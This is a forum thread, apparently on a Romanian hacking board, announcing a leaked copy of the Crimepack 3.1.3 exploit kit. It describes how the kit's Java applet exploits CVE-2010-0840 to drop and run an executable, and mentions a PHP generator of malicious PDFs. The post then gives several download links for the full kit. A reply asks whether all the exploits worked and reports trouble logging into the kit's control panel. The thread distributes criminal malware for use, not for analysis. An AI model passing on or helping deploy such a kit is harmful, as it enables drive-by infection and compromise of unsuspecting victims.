Jump to content
Nytro

Crimepack 3.1.3 Exploit kit

By Nytro, in Programe hacking

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted (edited)

Crimepack 3.1.3 Exploit kit

Crimepack 3.1.3 Exploit kit Leaked, available for Download !

crimpack-webstart2.png

Part 1: Java Exploit

As stated above, I focus on a malware that exploits a recent JRE vulnerability: CVE-2010-0840 to execute malicious files on a victim system. This malware comes inside a jar file, which contains the following two classes: Crimepack.class and KAVS.class.

Part 1.1: Crimepack.class

This class is the engine of the malware, it is obfuscated, but you can quickly strip off the obfuscation (my python beta tool is great…), once you get rid of the obfuscation you can see the following code:

cp.png

As always, we have an Applet that access to the data parameter, generates a random name for the exe payload that will be dropped in the system temp directory and then executed. So at this point as you can see we have nothing new, the above is a common Java downloader… but let’s scroll down:

trig.png

Above, we can see that the malware is creating a new instance of the KAVS class (description follows), in order to trigger the JRE vulnerability by using a call to the getValue() method (..snipped above..).

Part 1.2: KAVS.class

Here is the hand-crafted class, I say hand-crafted because such class cannot be compiled by using a standard compiler, so you have to edit the compiled class by editing the bytecode:

ka.png

Part 2: PDF-generator on demand

The kit contains a nice php script that drops custom pdf on-demand, which means that you can have several mutations of the same piece of malware, by simply connecting to a malicious link.

Download:

http://www.multiupload.com/3HGKHWMRS5

Sursa: Crimepack 3.1.3 Exploit kit Leaked, available for Download ! ~ THN : The Hackers News

Alternativ: 

http://www.speedyshare.com/files/28425214/Crimepack_3.1.3.zip
http://www.megaupload.com/?d=THZ8OW23

Edited by Nytro
michee Newbie

michee

Posted
Posted

dap, ms........acuma cei care ati testat, v-au mers toate sploaitele?

sigur nu e domeniul hardcodat pe undeva pe dinauntru?

wtff???reusiti sa accesati control.php? presupun ca acolo sunt stats-urile....Am incercat cu ambii useri care i-am creat la instalare, imi da mereu "Unauthorized"......am verificat si-n baza de date, e ac. parola criptata md5.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...